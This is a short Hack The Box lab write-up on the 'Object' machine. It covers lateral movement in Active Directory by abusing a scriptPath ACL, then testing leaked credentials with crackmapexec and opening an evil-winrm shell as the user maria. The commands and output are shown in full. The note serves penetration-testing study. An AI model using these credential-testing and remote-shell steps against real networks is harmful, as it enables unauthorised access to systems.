InfoSec LAB

Object_Lateral_Movement_maria

Created: 2 min read

WinRM

the smith user has one of the acls, writeproperty, configured for the maria user, allowing a threat actor to tamper the the scriptPath attribute to get code execution as the maria user. I was able to [[Object_Logon_Script#[Logon Script](https //www.thehacker.recipes/ad/movement/dacl/logon-script)|exploit]] the said ACE above, and discovered an Excel file in the home directory of the maria user that contained 3 Credentials. One of them is suspected to be a valid domain credential.

┌──(kali㉿kali)-[~/archive/htb/labs/object]
└─$ crackmapexec winrm jenkins.object.local -u maria -p maria.passwd -d OBJECT.LOCAL 
http        jenkins.object.local 5985   jenkins.object.local [*] http://jenkins.object.local:5985/wsman
winrm       jenkins.object.local 5985   jenkins.object.local [-] object.local\maria:d34gb8@
winrm       jenkins.object.local 5985   jenkins.object.local [-] object.local\maria:0de_434_d545
winrm       jenkins.object.local 5985   jenkins.object.local [+] object.local\maria:W3llcr4ft3d_4cls (Pwn3d!)

the valid domain credential is turned out to be maria:W3llcr4ft3d_4cls

┌──(kali㉿kali)-[~/archive/htb/labs/object]
└─$ evil-winrm -i jenkins.object.local -u maria -p W3llcr4ft3d_4cls
 
Evil-WinRM shell v3.5
warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
 
info: Establishing connection to remote endpoint
*evil-winrm* ps c:\Users\maria\Documents> whoami
object\maria
*evil-winrm* ps c:\Users\maria\Documents> hostname
jenkins
*evil-winrm* ps c:\Users\maria\Documents> ipconfig
 
Windows IP Configuration
 
 
ethernet adapter ethernet0:
 
   connection-specific dns suffix  . : htb
   ipv6 address. . . . . . . . . . . : dead:beef::21f
   ipv6 address. . . . . . . . . . . : dead:beef::bcc7:674e:326b:4143
   link-local ipv6 address . . . . . : fe80::bcc7:674e:326b:4143%12
   ipv4 address. . . . . . . . . . . : 10.10.11.132
   subnet mask . . . . . . . . . . . : 255.255.255.0
   default gateway . . . . . . . . . : fe80::250:56ff:feb9:d784%12
                                       10.10.10.2

Lateral Movement made to the maria user via WinRM

Interactive Graph View

Backlinks